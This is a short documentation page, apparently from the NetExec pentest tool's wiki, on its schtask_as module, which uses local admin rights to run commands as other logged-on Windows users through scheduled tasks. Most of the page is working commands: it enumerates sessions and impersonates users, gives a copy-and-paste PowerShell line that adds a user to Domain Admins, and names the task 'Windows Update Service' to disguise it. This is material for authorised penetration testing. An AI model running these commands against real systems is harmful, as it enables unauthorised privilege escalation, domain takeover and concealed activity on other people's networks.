Impersonate logged-on Users
Use Sessions from logged-on Users to execute arbitrary commands using schtask_as
Last updated
Was this helpful?
Use Sessions from logged-on Users to execute arbitrary commands using schtask_as
Last updated
Was this helpful?
Was this helpful?
You need at least local admin privilege on the remote target
The Module schtask_as can execute commands on behalf of other users which have sessions on the target, thanks to the contribution from @Defte_.
There are two ways you can enumerate logged on users on a Windows machine:
--loggedon-user
nxc smb <ip> -u <localAdmin> -p <password> --loggedon-users--qwinsta
nxc smb <ip> -u <localAdmin> -p <password> --qwinstaNote that these two options do not output the same result at all. Indeed --loggedon-users returns the list of logged users as well as to which DC they connected to. The --qwinsta returns the windows interactive sessions that are running on the system. Having a loggedon users doesn't necessarly mean that you can impersonate it via schtask_as, indeed that module requires the user you are targetting to have a Windows interactive session. As such, if you really want to be sure you can impersonate someone with that module, run the --qwinsta option.
nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
CMD Command to execute
USER User to execute command as
BINARY OPTIONAL: Upload the binary to be executed by CMD
TASK OPTIONAL: Set a name for the scheduled task name
FILE OPTIONAL: Set a name for the command output file
LOCATION OPTIONAL: Set a location for the command output file (e.g. '\tmp\')Example:
nxc smb [] -u [] -p [] --local-auth -M schtask_as -o USER=[target] CMD="whoami" TASK="Windows Update Service" FILE="update.log" LOCATION="\\Windows\\Tasks\\"Custom command to add a user to the domain admin group for easy copy&pasting:
powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"Note that the BINARY option allows you specifying a local binary that will first be uploaded to the remote server, executed and cleared. This allows us not having to upload the binary and then run the module.